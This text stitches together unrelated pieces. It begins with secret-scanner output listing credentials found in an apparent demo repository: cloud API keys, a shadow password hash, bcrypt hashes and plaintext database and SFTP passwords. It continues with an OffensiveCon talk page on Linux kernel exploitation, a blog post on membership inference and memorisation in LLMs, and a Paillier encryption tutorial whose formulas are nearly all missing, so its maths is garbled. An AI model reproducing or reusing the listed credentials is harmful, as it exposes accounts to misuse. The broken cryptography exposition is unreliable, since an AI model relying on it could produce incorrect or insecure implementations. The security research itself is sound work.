/private/tmp/demo/leaky-repo/web/ruby/secrets.yml:22:PASSWORD:Rule:55:secret_key_base: :8969518770d7484053e72f09c7bd37995d79c320e618ce3ec7a44b7c43fafff1615622a01513789bff7ac7a5201c6382bb6851632c8aa63e76bf0f0a01ed0e17:
/private/tmp/demo/leaky-repo/etc/shadow:20:PASSWORD:Rule:67:ubuntu::$6$LnUhhUi45srUKt9i$4Hp6VRTOB2mxvsYH8mwsCfBryg6hCbm4JJjV26KplN8ewZ7EUVqQDkLKDW.O8XRHx.B76JkwXtyD3wnAXEuZN1:0:99999:7::::
/private/tmp/demo/leaky-repo/cloud/.s3cfg:1:PASSWORD:Rule:28:secret_key = :yLryKGwcGc3ez9G8YAnjeYMQOc: 
/private/tmp/demo/leaky-repo/cloud/.s3cfg:2:PASSWORD:Rule:28:access_key = :nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX: 
/private/tmp/demo/leaky-repo/cloud/.tugboat:4:PASSWORD:Rule:63:api_key: :3b6311afca5bd8aac647b316704e9c6d: # Risk.
/private/tmp/demo/leaky-repo/cloud/.credentials:4:PASSWORD:Rule:28:aws_secret_access_key = :nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX:
/private/tmp/demo/leaky-repo/cloud/.credentials:7:PASSWORD:Rule:28:aws_secret_access_key = :nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX:
/private/tmp/demo/leaky-repo/cloud/heroku.json:4:PASSWORD:Rule:29:      "HEROKU_API_KEY": ":7a2f9a4289e530bef6dbf31f4cbf63d5:"
/private/tmp/demo/leaky-repo/db/robomongo.json:14:PASSWORD:Rule:65:userPassword" : ":mongopass:"
/private/tmp/demo/leaky-repo/db/robomongo.json:22:PASSWORD:Rule:66:sshPassphrase" : ":SSHPass123:",
/private/tmp/demo/leaky-repo/db/robomongo.json:27:PASSWORD:Rule:65:sshUserPassword" : ":roboMongoSSHPass:",
/private/tmp/demo/leaky-repo/db/mongoid.yml:4:PASSWORD:Rule:4:      uri: "mongodb://testuser::testpass:@ds048537.mongolab.com:48537/main"
/private/tmp/demo/leaky-repo/db/dump.sql:32:PASSWORD:Rule:64:(1, 'rogers63', ':$2y$12$s.YfVZdfvAuO/Iz6fte5iO..ZbbEgreZnDcYOGvX4NGJskYQIstcG:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:33:PASSWORD:Rule:64:(2, 'mike28', ':$2y$12$Sq//4hEpn1z91c3I/iU67.rqaHNtD3ucwG0Ncx7vOsHST4Jsr2Q0C:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:34:PASSWORD:Rule:64:(3, 'rivera92', ':$2y$12$3iskP41QVYgh2GFesX2Rpe0DstoL9GpIsvYxM4VI24jcILuCha3O2:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:35:PASSWORD:Rule:64:(4, 'ross95', ':$2y$12$hnktY9dEP/LexZjZ5b9B7ubzgxjO2393dWDaregvwPPaiRicOYkpu:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:36:PASSWORD:Rule:64:(5, 'paul85', ':$2y$12$M593ZP8u9pOnJiBIUbyW1.r8KfCy8uv9UCgDlX2oj3OtHmibEsQie:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:37:PASSWORD:Rule:64:(6, 'smith34', ':$2y$12$GEu9AWgT/Jf9Kgj/WEUanOkoa5OBC6W4cPkGeuVyROcS9T1U6orX.:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:38:PASSWORD:Rule:64:(7, 'james84', ':$2y$12$hjrJNp/UijB4YKg5rMhDeOoqUT5Oe2T7pTfxCEgyfgYtrHC5ph36W:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:39:PASSWORD:Rule:64:(8, 'daniel53', ':$2y$12$lipAFqG0QyyYKa.S16oTNOdFgkr3svEUx7JOl1HYU4m03oYFq89Uq:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:40:PASSWORD:Rule:64:(9, 'brooks80', ':$2y$12$/jJGIYh9wizWMFIcu79TEucXzYtvRdn3YxUpGUKnoZT1B6Gv2taSm:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:41:PASSWORD:Rule:64:(10, 'morgan65', ':$2y$12$kZ55ticjwXD9d/A5o3y8..fA7/1qycT2befZ4QrCjJCfrxk415gUy:', 1);
/private/tmp/demo/leaky-repo/.vscode/sftp.json:6:PASSWORD:Rule:19:    "password": ":swordfish!23:"
/private/tmp/demo/leaky-repo/filezilla/recentservers.xml:13:PASSWORD:Rule:69:			<Pass encoding="base64">:NjllNWU5ZWMwZDU0MmU5Y2QwOTY4MWM5YzZhMDdkYWVmNjg3OWE3MDMzM2Q4MWJmCg==:</Pass>
/private/tmp/demo/leaky-repo/filezilla/recentservers.xml:30:PASSWORD:Rule:69:			<Pass encoding="base64">:NjllNWU5ZWMwZDU0MmU5Y2QwOTY4MWM5YzZhMDdkYWVmNjg3OWE3MDMzM2Q4MWJmCg==:</Pass>
/private/tmp/demo/leaky-repo/.idea/WebServers.xml:6:PASSWORD:Rule:17:        <fileTransfer host="example.com" port="21" password=":dff9dfdfdfdadfcfdfd8dff9dfcfdfcfdfc9dfd8dfcfdfdedffadfcbdfd9dfd9dfdddfc5dfd8dfcedf8b:" username="root">
CCS: Credentials were found
[email protected] % 

Cedric Halbronn and Alex Plaskett presented at OffensiveCon on the 19th of May 2023 on Exploit Engineering – Attacking the Linux kernel.

Slides

The slides for the talk can be downloaded below:

libslub

libslub can be downloaded from here.

Abstract

The abstract for the talk was as follows:

Over the last year the Exploit Development Group (EDG) at NCC Group found and exploited three different 0-day Linux kernel local privilege escalation vulnerabilities (CVE-2022-0185, CVE-2022-0995, CVE-2022-32250) against fully patched OSs with all mitigations enabled. The most recent vulnerability was patched against versions of the kernel going back 6 years affecting most stable Linux distributions.

Unlike developing proof of concepts, our exploits need to be ultra-reliable and support many different OS variations and kernel versions so they can be used by our security assessment consultants or Red Teams. This calls for a much more rigorous engineering process to be followed.

In this talk, we start with an overview of our bug hunting processes and approach to rapidly find high impact vulnerabilities within the Linux kernel. The talk will then describe key vulnerability details, discuss the challenges of reliable exploitation across multiple targets and describe the exploitation techniques used (and what is appropriate in 2023). We discuss rigorous exploit engineering approaches – including tooling which we have developed for heap analysis (libslub) and automation for mining, creation, deployment and scaling across many different environments (TargetMob). Finally, we will conclude with our thoughts on areas where more strategic hardening and attack surface reduction can be introduced to hinder against advanced attackers using 0-days in the Linux kernel. We will leave you with a release of our tooling for heap analysis (libslub) and the knowledge to go out there and find, analyse and exploit your own Linux kernel vulnerabilities!

In the following blog post, we explore how overfitting can affect Large Language Models (LLMs) in particular, since this technology is used in the most promising AI technologies we see today (chatGPT, LLaMa, Bard, etc). Furthermore, by exploring the likelihood of inferring data from the dataset, we will determine how much we can trust these kind of models to not reproduce copyrighted content that existed in their training dataset, which is another risk associated with overfitting.

Overfitting is a concept used in the ML field that refers to the situation where the model fits the training data so well that it cannot generalise its predictions for unseen data. Although this may not be the perfect explanation for a data scientist, we could say that a model with good generalisation is “understanding” a problem. In contrast, an overfitted model is “memorising” the training dataset. In the real world, data scientists try to find a balance where the model generalises well enough, even if some overfitting exists.

As we have seen in most ML models, overfitting can be abused to perform certain attacks such as Membership Inference Attacks (MIAs), among other risks. In MIAs, attackers infer if a piece of data belongs to the training dataset by observing the predictions generated by the model. So, for example, in an image classification problem, a picture of a cat that was used in the training process will be predicted as “cat” with a higher probability than other pictures of cats that were not used in the training process, because that small degree of overfitting that most models have.

Overfitting in LLMs

Most of the LLMs we see today predict a new token (usually a small piece of a word) based on a given sequence of tokens (typically, an input text). Under the hood, the model generates a probability for each one of the tokens that could be generated (the “vocabulary” of the model). As an example, the design of Databricks’ Dolly2 model, as it is implemented in HuggingFace, is following:

GPTNeoXForCausalLM(
  (gpt_neox): GPTNeoXModel(
    (embed_in): Embedding(50280, 2560)
    (layers): ModuleList(
      (0-31): 32 x GPTNeoXLayer(
        (input_layernorm): LayerNorm((2560,), eps=1e-05, elementwise_affine=True)
        (post_attention_layernorm): LayerNorm((2560,), eps=1e-05, elementwise_affine=True)
        (attention): GPTNeoXAttention(
          (rotary_emb): RotaryEmbedding()
          (query_key_value): Linear(in_features=2560, out_features=7680, bias=True)
          (dense): Linear(in_features=2560, out_features=2560, bias=True)
        )
        (mlp): GPTNeoXMLP(
          (dense_h_to_4h): Linear(in_features=2560, out_features=10240, bias=True)
          (dense_4h_to_h): Linear(in_features=10240, out_features=2560, bias=True)
          (act): GELUActivation()
        )
      )
    )
    (final_layer_norm): LayerNorm((2560,), eps=1e-05, elementwise_affine=True)
  )
  (embed_out): Linear(in_features=2560, out_features=50280, bias=False)
)

The “out_features” are 50280 probabilities/scores, one for each possible token from the vocabulary. Based on the training dataset this model was exposed to, they show the likelihood of the next token to be predicted. Then, one of the tokens with the highest score is chosen, based on parameters such as “temperature” or “Top P”, which is generally shown as the next generated token.

However, models also allow you to inspect those scores, with independence of the chosen token. For example, the code snippet below shows how the HuggingFace model “databricks/dolly-v2-3b” was parametrized to show the complete score information.

prompt_text = "Do or do"
inputs = tokenizer(prompt_text, return_tensors="pt")
input_ids = inputs["input_ids"]

x = model.generate(
    input_ids=input_ids.to(model.device),
    attention_mask = torch.ones(input_ids.size(0), input_ids.size(1)),
    pad_token_id=tokenizer.eos_token_id,
    return_dict_in_generate=True,
    output_scores=True,
    max_new_tokens=1
)

next_id = x.sequences[0][-1]
print_top_scores(prompt_text, x.scores, next_id)

Although the implementation of “print_top_scores()” is not shown for clarity, it shows the top 10 candidates for the next token with their corresponding normalised scores:

Do or do not	(0.9855502843856812)
Do or do-		(0.0074768210761249)
Do or do NOT	(0.0016151140443980)
Do or do N	(0.0005388919962570)
Do or do_		(0.0003805902961175)
Do or do or	(0.0003312885237392)
Do or do you	(0.0003257314674556)
Do or do Not	(0.0002487517194822)
Do or do (	(0.0002326328831259)
Do or do \n	(0.0002092608920065)

Based on this information, “ not” (yes, beginning with whitespace) seems to have the highest score and, if we continue generating tokens, we obtain the following text.

The “Do or do not, there is no try”, obviously part of the training dataset as a mythic Star Wars quote, was generated from the “Do or do” input text. Have you seen where we cheated? Certainly, “Do or do not, but” had a slightly higher score than “Do or do not, there”, but they were very similar. That happened because both sentences (or pieces of sentences) probably belonged to the training dataset. We will talk more about this later.

Will that happen with every single LLM or just Dolly2? Let’s see an example using the “gpt2” model, also hosted in Huggingface.

Do or do not do.	(0.0317150019109249)
Do or do not you	(0.0290195103734731)
Do or do not use	(0.0278038661926984)
Do or do not have	(0.0234157051891088)
Do or do not.		(0.0197649933397769)
Do or do not take	(0.0186729021370410)
Do or do not get	(0.0179356448352336)
Do or do not buy	(0.0150753539055585)
Do or do not make	(0.0147862508893013)
Do or do not,		(0.0139999818056821)

As you can see, it is much more challenging to detect which of the next token candidates corresponds to the training dataset. Although they (in red) are still in the top 10 of the highest scores, they are not even in the top 3.

We find the complete opposite situation with OpenAI’s Playground, model “text-davinvi-003” (GPT-3) and temperature equal to zero (always choose the more probable next token).

We can see how the target sentence was generated. Although the Playground supports providing the detailed probabilities for each token, it was not necessary at this time, since we found that the tokens for the target text were always the candidates with the highest scores.

This is just an example, not a complete and detailed analysis, but it illustrates perfectly how overfitting usually impacts more on bigger models: As a reference, this is the size of the above mentioned models in billions of parameters: GPT-3 (175b), Dolly2 (3b) and GPT-2 (1.5b).

Membership Inference

As shown above, detecting which token may correspond to overfitted data is not always easy, so we tried several additional experiments to find an effective way to exploit Membership Inference Attacks (MIA) in LLMs. Although we tried other methods, the technique used in the Beam Search generation strategy was also the most effective for MIAs. This technique calculates a probability of a sequence of tokens as a product of each token’s probability. As new tokens are generated, the N highest probability sequences are kept. Let’s see an example with our target quote: “Do or do not, there is no try”.

The graph above shows candidate tokens and their probability for each step. Some nodes with very low probabilities have not been represented to facilitate analysis, but remember that the top 3 scores for each next candidate token were generated.

The path in blue represents the “Greedy Search” result, which means always choosing the more probable candidate token on every step (in the absence of “temperature”). The sentence “Do or do not, but do not tell” is generated in our example. However, you can easily see that the path in red (“Do or do not, there is no try”) has higher probabilities in all the sequence, except in the first element. If we calculate the overall probability for the red path, it will be 0.17, much higher than the blue path, which is 0.01. This happens because, although there were other potential tokens with high probability at some point, an overfitted sentence should have high probabilities (not necessarily the highest, but consistently high ones) for every single token.

As this technique is already implemented in LLMs to generate more natural text, we can easily obtain a list of the most probable sequences using this approach. For example, in the following code snippet, we generate tokens using a beam size of 10 (we keep the sequences of the 10 highest probabilities) and obtain all of them after the last step.

x = model.generate(
    input_ids=input_ids.to(model.device),
    attention_mask = torch.ones(input_ids.size(0), input_ids.size(1)),
    pad_token_id=tokenizer.eos_token_id,
    num_beams=10,
    num_return_sequences=10,
    early_stopping=True,
    max_new_tokens=6
)

We can add a little bit more code to calculate the final probability, since that is not given by default, and we will obtain the following results:

Do or do not, there is no try		(0.050955554860769010)
Do or do not; there is no try		(0.025580763711396462)
Do or do not, there is no '		(0.006636739833931039)
Do or do not, but do it well		(0.005970277809022071)
Do or do not, there is no "		(0.005454866792928952)
Do or do not; there is no "		(0.005357746163965427)
Do or do not, but do or do		(0.005282247360819922)
Do or do not; there is no '		(0.004159457944373084)
Do or do not, but do so quickly	(0.003438846991493329)
Do or do not, but do not tell		(0.001629174555881396)

The two results with higher probabilities are the same sentence, with some minor variations, which makes sense given that it is a transcription of a movie and could have been written differently.

Unfortunately, this technique still doesn’t work to exploit MIAs in smaller language models such as GPT-2.

It is worth mentioning that datasets used to train base models are typically built by collecting public text data from the Internet, so the impact of exploiting an MIA is low. However, the impact increases if the base model is fine-tuned using a private and sensitive dataset that should not be exposed.

Copyrighted Material

Another side effect of overfitting in generative models is that they can generate copyrighted material. As happened before, in theory, the bigger a model is, the more likely this may happen.

In the screenshot below, we see OpenAI’s Playground (“temperature” set to 0) reproducing the beginning of the well-known novel “The Lord of the Rings” after several words matching that beginning.

As can be observed in the probabilities of each token (2 examples are shown), the likelihood of generating copyrighted material increases after each new token is generated. After a few tokens are generated, the following tokens follow the target sequence with probabilities higher than 90-95%, so it is likely reproducing copyrighted material. However, the likelihood of the model generating copyrighted material from scratch is much lower.

Conclusions and Recommendations

Overfitting is definitely a risk also in LLMs, especially in larger models. However, its impact strongly depends on the model’s purpose. For example, producing copyrighted material or leaking information from the training dataset may be security problems, depending on how the model is used.

Models trained with sensitive material should avoid providing verbose information such as the list of candidate next tokens and their probabilities. This information is helpful for debugging, but it facilitates MIAs. Also, deploy rate limiting controls, since exploiting this kind of attack requires massive generation requests. Finally, if possible, don’t let users set parameters other than the input text.

For models generating output that may be used as original content, it is recommended to keep high “temperature” and low “num_beams” (“best of” in OpenAI’s Playground). Also, models can be fine-tuned to cite the original author when reproducing copyrighted material, as chatGPT does. Other heuristic controls may also be deployed to guarantee that no copyrighted material is produced.

Acknowledgements

Special thanks to Chris Anley, Eric Schorn and the rest of the NCC Group team that proofread this blogpost before being published.

You may have heard of RSA (b. 1977), but have you heard of its cousin, Paillier (b. 1999)? In this post, we provide a close look at the Paillier homomorphic encryption scheme [Paillier1999], what it offers, how it’s used in complex protocols, and how to implement it securely.

Contents

• RSA Encryption Refresher and Notation
• The Computational Composite Residuosity Class Problem
• The Paillier Cryptosystem
• Security and Homomorphic Properties
• Applications and Protocols using Paillier Encryption
  • [Lindell2017], [GenGol2019], [CanGenGolMakPel2021]
• Implementation Considerations
  • Key generation, Encryption, Decryption, Homomorphic operations
• Conclusion

RSA Encryption Refresher and Notation

We’ll start with a review of RSA encryption and two related functions: Euler’s phi function and Carmichael’s lambda function .

RSA works in a group where is a product of two distinct primes (also called a biprime or an RSA prime). Both plaintexts and ciphertexts are in this group.

For any integer , is the set of integers less than and co-prime to and it always forms a multiplicative group called the group of units modulo . An integer less than and co-prime to is called a totative of .

The primes and should be chosen independently and randomly. RSA moduli don’t need to be generated with safe primes or strong primes; two random primes are fine. (In 1999, Rivest and Silverman published an article titled “Are ‘Strong Primes’ Needed for RSA?” (PDF) in which they argued that it is unnecessary to use strong primes.)

The number of elements in is, by definition, .

For any integer , is Euler’s phi (or totient) function, defined as the number of totatives of (i.e., positive integers less than or equal to that are co-prime to it). Euler’s phi function is a multiplicative function: if and are co-prime, then .

In the RSA setting, is a product of two distinct primes, so the size of is .

The RSA cryptosystem uses a public encryption exponent and a private decryption exponent . Encrypting a message is done by computing , and decrypting a ciphertext is done by computing . For these operations to be correct, they must be inverses of each other: it’s required that for all . In other words, and must satisfy for every possible message .

The order of an integer modulo is the smallest positive integer such that (or undefined if no such exists, but this case won’t arise in this blog post).

For RSA decryption and encryption to be correct for all possible messages , it is necessary and sufficient for the product to be congruent to 1 modulo .

For any integer , is Carmichael’s lambda (or least universal exponent) function, defined as the smallest positive integer such that for all totatives . It is the least common multiple of the orders of all elements in , so it is always less than or equal to the order of the group, . If (and only if) , then the group has a generator. (See the first definition of the Carmichael function at Wolfram MathWorld.)

Unlike Euler’s phi function, Carmichael’s lambda function is not quite a multiplicative function, but it satisfies a similar property: if and are co-prime, then , where is the least common multiple function. It turns out that if is a power of an odd prime, say , then . (The value of for is slightly different: it is either for , or for , but this fact won’t be used in this post.)

Just as can be efficiently computed when ’s factorization into prime powers is known, can also be efficiently computed based on ’s factorization into prime powers.

You may have learned RSA encryption with the requirement that modulo instead of modulo — this is how I learned it too. Although this condition with Euler’s phi function is sufficient for correctness (since always divides ), it is not necessary (since is always at most ).

In this post, only two values of the Carmichael lambda function will arise: and , for with odd primes and . Their values are and .

The Computational Composite Residuosity Class Problem

RSA encryption is effective at hiding data because it’s believed to be hard to find th roots modulo a product of two primes, . This is (rather redundantly) called the RSA problem.

Let be a biprime and let be an integer greater than 2 in . The RSA problem is to solve the equation for given a random .

For Paillier encryption, we again consider some integer that is a product of two primes, with the additional requirement that . An easy way to guarantee this requirement is satisfied is to choose and to have the same bitlength (i.e., to have their most significant bit in the same position). Instead of working with ciphertexts that are integers modulo as in RSA, Paillier ciphertexts are integers modulo . Specifically, Paillier ciphertexts are in , the group of units modulo , which has order for a biprime .

There are multiple ways to think of the set of integers in this group. Here’s a non-obvious one: for an appropriate choice of base (having a particular property, as we will explain soon), each integer in corresponds to a pair of integers , where is in , is in the group of units , and .

While it’s easy to compute given a pair for a fixed base modulo , it’s believed to be hard to compute the unique, corresponding pair for a particular without some additional information.

Not every possible value of is an appropriate base; must be chosen so that for every in , there is exactly one pair in such that . It turns out (see Lemma 3 of [Paillier1999]) that we get this property exactly when is an element of whose order is a (non-zero) multiple of . Since the order of any element in is at most , bases are those elements with orders in . (There isn’t necessarily a base with each of these orders; the order of any element in must divide .)

In other words, is an appropriate base when there’s a (non-zero) multiple of such that , but for any positive integer .

For some biprime , is called a base if its order modulo is a non-zero multiple of .

With such a base, the correspondence between a and some is a proper bijection. Although this post won’t prove that the mapping yields a bijection, you can do a quick, reassuring check that both groups have the same size, . (For the full proof, see Lemma 3 of [Paillier1999]). The first element of the pair, , is called the th residuosity class of with respect to and Paillier is effective at hiding data because computing it is believed to be a hard problem.

Let be a biprime and let be a base. Given , , and a random value , the composite residuosity class problem is to compute the unique such that for some .

There are many potential bases having orders modulo that are non-zero multiple of . However, there’s no need to run a complex algorithm to identify one due to a nice property of the set of potential bases: the hardness of computing the residuosity class of a random modulo relative to some base doesn’t actually depend on the choice of ! (For the proof, see Lemma 7 of [Paillier1999].) A common choice of base is , which has order , because it allows optimizations during encryption and decryption.

The Paillier Cryptosystem

The Paillier cryptosystem is built so that decrypting a ciphertext corresponds to solving the computational composite residuosity class problem. First, we’ll go over the mechanics of key generation, encryption, and decryption, and then we’ll dive in to how decryption works and explain the trick that allows doing it efficiently.

Key generation. Pick two primes and of the same bitlength independently at random. Let be their product. Choose a base whose order is a non-zero multiple of , e.g., . Compute the Carmichael lambda function of : . The public key is and the private key is .

Encryption of a message . Pick a random integer and compute the ciphertext .

Decryption of a ciphertext . Compute the two values and . Then, compute the resulting message .

One of the brilliant properties of Paillier’s scheme is that knowing the factorization of allows efficiently computing composite residuosity classes: calculating gives a trapdoor for computing the necessary discrete logarithm.

Recall that, for a base , any can be written as for a unique pair of and — these and values just aren’t known yet. Decryption has three implicit sub-steps: cancelling out the random value , bringing the plaintext down from the exponent, and isolating from values that depend on the base .

1. Cancelling out the random value is straightforward when is a biprime.
   Since the least universal exponent modulo is , raising to the power of modulo yields for some not-yet-known , because .
2. Next, we observe that the exponentiation in step 1 was enough to bring down from the exponent.
   Raising any element to the power of modulo yields something called an th root of unity modulo . This is an element that, when raised to the power of , yields 1 — in other words, its order must be either or . This follows from the definition of the least universal exponent, . These th roots of unity modulo all have a particular form: they can be written as for some . To partially convince yourself this is true, observe that applying binomial expansion to modulo gives 1. (See Section 2 in [Paillier1999].) So, is an th root of unity and can be written as for some . The result of step 1 () can therefore be written as for some . By applying binomial expansion once more, we see that it can be written as . By subtracting 1 and dividing by (over the integers), we get the value of the dividend in the description of decryption above: .
3. Finally, we need to isolate by dividing by (modulo ).
   The value of depends only on the base : , so . This is the value of in the description of decryption. The last step of decryption is to compute .

Security and Homomorphic Properties

Paillier encryption effectively hides data (the messages ) assuming that computing the th residuosity classes of ciphertexts is hard. More strongly, and more formally, Paillier ciphertexts are indistinguishable under chosen plaintext attacks (IND-CPA) assuming that deciding whether the th residuosity class of a ciphertext equals some given value is hard. (See Theorem 15 in [Paillier1999].)

However, Paillier ciphertexts cannot be indistinguishable under chosen ciphertext attacks (IND-CCA) because of the scheme’s homomorphic properties. In general, a homomorphic encryption scheme is one that allows certain operations to be performed on ciphertexts such that the resulting ciphertexts contain the encrypted result. Paillier encryption is additively homomorphic:

and

The first equation above says that multiplication of ciphertexts modulo corresponds to addition of plaintexts modulo . The second equation says that exponentiation of a ciphertext to a constant modulo corresponds to multiplication of a plaintext by a constant modulo .

In the context of IND-CCA security, these properties would allow an attacker with access to a decryption oracle (that works on any ciphertext besides the target ciphertext) to decrypt a target ciphertext by transforming it homomorphically before querying the oracle, and undoing the transformation after. In that sense, Paillier is no different than any other homomorphic encryption scheme: no homomorphic encryption scheme can offer IND-CCA security.

Applications and Protocols using Paillier Encryption

In the 20+ years since Pascal Paillier devised this encryption scheme, it has been used in a variety of cryptographic protocols and applications. One recent popular application is multi-party ECDSA signing protocols.

ECDSA produces signatures in a group of elliptic curve points over a field of order with generator of order . (We write and here to distinguish these primes from the factors of an RSA or Paillier modulus — they are completely different.) ECDSA private keys are elements (scalars) and public keys are the corresponding elliptic curve points, . The signature on a message whose hash is is computed as

where for a fresh, uniformly random .

In multi-party ECDSA signing protocols, two or more parties have shares of a private key and jointly generate signatures. These schemes typically provide security and correctness even when some small number of protocol participants misbehave. To achieve this, the use of Paillier encryption is often augmented with zero-knowledge proofs: for example, protocol participants can prove that their Paillier public keys were correctly generated, that ciphertexts encrypt values within given ranges, or that ciphertexts encrypt values corresponding to the discrete logarithm of some known public value.

Combining Paillier encryption — which works in groups modulo or , where is usually at least 2048 bits long — and ECDSA — which works in groups whose sizes are usually 256 bits — is not trivial. To illustrate this, we’ll examine three recent multi-party ECDSA protocols.

Lindell’s Two-Party ECDSA Protocol (2017)

Lindell’s two-party ECDSA signing protocol [Lindell2017] uses Paillier encryption to compute the component of the signature homomorphically. During key generation, the first party sends a Paillier encryption of their share of the ECDSA private key to the second party, along with zero-knowledge proofs that (i) their Paillier modulus satisfies , and (ii) the ciphertext is indeed an encryption of the discrete log of . Then, when generating a signature, the second party can craft most of the component of the signature by operating homomorphically on the encryption of and combining it with a ciphertext that it crafts. The second party sends back the Paillier ciphertext to the first party, who decrypts it and performs a final operation with their share of the nonce.

Since the second party crafted the ciphertext homomorphically, it cannot reduce the encrypted value modulo before sending it back to the first party, which may allow some information to leak. To prevent this, the second party must add a random multiple of when it is forming the ciphertext.

The proof that is described in a paper by Hazay, Mikkelsen, Rabin, Toft, and Nicolosi (eprint 2011/494, Section 3.3). Interestingly, proving that the Paillier modulus satisfies — which guarantees nothing about how many prime factors it has — is sufficient for the security of this particular ECDSA protocol: using the base , there is still the same isomorphism between and . The Paillier modulus must be at least , where is the size of the ECDSA group.

The Gennaro–Goldfeder Multi-Party Threshold ECDSA Protocol (2018–2021)

In Gennaro and Goldfeder’s threshold ECDSA protocol [GenGol2019], each party has their own Paillier key pair. Each Paillier modulus is accompanied by a zero-knowledge proof that it is square-free and that for any two prime factors and of the modulus, does not divide . This proof was devised by Gennaro, Micciancio, and Rabin (CCS 1998, PDF, Section 3.1). The protocol also requires that each Paillier modulus is greater than , where is the size of the ECDSA group.

Each participant has an additive share of the private ECDSA key . When the signing protocol is run, each party also randomly generates an additive share of the nonce inverse and an additive share of the nonce “mask” used to hide the value of (which, if leaked, would allow recovering the ECDSA private key). As part of jointly computing the signature, parties must compute additive shares of the products and . Paillier encryption is used in a sub-protocol for multiplicative-to-additive share conversion during the computation of additive shares of these two products.

Suppose there are parties whose goal is to jointly compute the product , and each party has additive shares and of and . The product can be written as

The share conversion protocol transforms multiplicative shares of values (the cross-terms ) held by parties and to equivalent additive shares ( and ) satisfying . It works as follows. First, party sends party a Paillier encryption of their multiplicative share (along with a zero-knowledge proof that the encrypted value is in the correct range respective to ). Party operates homomorphically on the ciphertext it received to compute an encryption of for a random (and provides a zero-knowledge proof that the ciphertext was formed with values from the correct ranges). Party then computes their additive share by decrypting this ciphertext and reducing it modulo . Party ’s additive share is .

Note that is sampled uniformly at random from , not (where is the ECDSA group size) or (where is the Paillier modulus). This modulus was chosen so that the range of possible values is big enough that the distribution of does not leak information about , but small enough that no reduction modulo the Paillier modulus occurs when homomorphically computing the ciphertext of .

Finally, after repeating this sub-protocol for all cross-terms in the product of , each party can compute their additive share of the product as . This is how additive shares of the products and are computed.

The Canetti–Gennaro–Goldfeder–Makriyannis–Peled Threshold ECDSA Protocol (2020–2021)

In Canetti, Gennaro, Goldfeder, Makriyannis, and Peled’s threshold ECDSA scheme [CanGenGolMakPel2021], each party has their own Paillier key pair that is accompanied by a proof that the modulus is a Paillier-Blum modulus (that it is a product of two primes congruent to 3 modulo 4 and that it satisfies ) and that it has no small factors.

Paillier encryption has several uses in this scheme.

• First, it is used in a multiplicative-to-additive share conversion protocol like the ones in Gennaro and Goldfeder’s 2018 protocol, described earlier, to compute additive shares of and during signing. The zero-knowledge proof accompanying the first party’s (party ’s) message is like the one described earlier: it proves that the encrypted value is in the correct range with respect to . The proof accompanying party ’s message is slightly different than in Gennaro and Goldfeder’s multiplicative-to-additive share conversion scheme. Recall that party operates homomorphically on the ciphertext it received from party by multiplying it with and adding to it using party ’s Paillier key. Here, party provides a zero-knowledge proof that the ciphertext it sends back to party was formed with values from the correct ranges, and that (i) the multiplicative coefficient equals the discrete log of a certain known value, and (ii) the additive term equals the same value encrypted in a Paillier ciphertext using party ’s own key.
• Paillier encryption is also used in a key refresh procedure, where each party chooses a random secret sharing of 0 (modulo the ECDSA group order ) and encrypts one share to each other party’s Paillier key. The parties then use the received shares to update their secret key shares without changing their shared public key.
• Finally, the Paillier modulus is re-used as the modulus of ring Pedersen (Fujisaki–Okamoto) commitments (eprint 2001/064, PDF), whose security relies on the strong RSA problem. Each party has a pair of ring Pedersen parameters (where is their Paillier modulus), for which they provide a zero-knowledge proof that belongs to the multiplicative group generated by modulo . Ring Pedersen commitments are used in zero-knowledge proofs with the verifier’s Paillier modulus.

The paper includes the interesting observation that Paillier encryption can be used as a commitment scheme to simplify some zero-knowledge proofs. When a participant encrypts a plaintext with their own Paillier key, it produces a cryptographic commitment to that plaintext that is perfectly binding (due to the bijection between and ) and computationally hiding (due to Paillier’s IND-CPA security, assuming computing th residue classes is hard).

Interestingly, this paper defines Paillier decryption with instead of for the base . Since , the decryption equation is still correct with and .

Implementation Considerations

Key Generation

Paillier key generation has many of the same potential pitfalls as RSA key generation, as well as some other potential issues related to the choice of base.

• First, the public key should be big enough that factoring it with modern, general-purpose algorithms, like the General Number Field Sieve (GNFS), is infeasible. For factoring the modulus with the GNFS to be roughly at least as hard as brute-forcing a 128-bit symmetric key, the modulus size should be at least 3072 bits, so the two prime factors and should be at least 1536 bits each.
• It is crucial to use a good source of randomness when selecting primes and , and to choose them independently so that no special-purpose factoring algorithms apply. For example, if the primes are too close together, the modulus can be factored efficiently with Fermat’s factorization method.
• The modulus must satisfy . An easy way to enforce this property is to choose the two primes and having exactly the same bitlength. If , then either divides or divides . And since , it will not be co-prime to either. This destroys the bijection between the groups and (for any base, even one with the correct order), and decryption no longer works. As a quick example, consider and , so is not co-prime with . First, raising an element to the power of , as is done to randomize ciphertexts during encryption, is a many-to-one function, which is enough to break the bijection. For example, Second, even with a proper base like , which has order modulo , decryption no longer works and many plaintexts can correspond to the same ciphertexts. For example, the five messages , , , , and would be indistinguishable during decryption after raising the ciphertext to the power of :
• The order of the base modulo must be a non-zero multiple of .
  Otherwise, there is no longer a bijection between the groups and . As a quick example, consider , , , and the base , which has order modulo (which is not a multiple of ). Then, encryption is a 13-to-1 mapping and every has 13 possible corresponding messages. For example, the ciphertext could be obtained by encrypting any one of :

Encryption

Paillier encryption is randomized and the random values must be carefully generated and handled.

• It is important to use a good source of randomness when choosing , and to generate a fresh, independently chosen value of every time a message is encrypted. Known relations between the values of multiple ciphertexts can be exploited to learn information about their corresponding plaintexts. For example, suppose two ciphertexts and (encrypting and ) are known to have been generated with the base using random values that are inverses of each other modulo : and . Then, due to the additively homomorphic properties of Paillier ciphertexts and the cancellation of the random values, the sum of the plaintexts (modulo ) can be recovered by computing .
• Since encryption includes modular exponentiation to a secret value (), a constant-time implementation — one without any data-dependent operations — must be used to avoid leaking information about the plaintext.
• The random element also must be kept secret and handled in constant-time.
  If the value corresponding to a particular ciphertext is ever leaked, the plaintext can be recovered by computing (e.g., using the Extended Euclidean Algorithm), then computing .

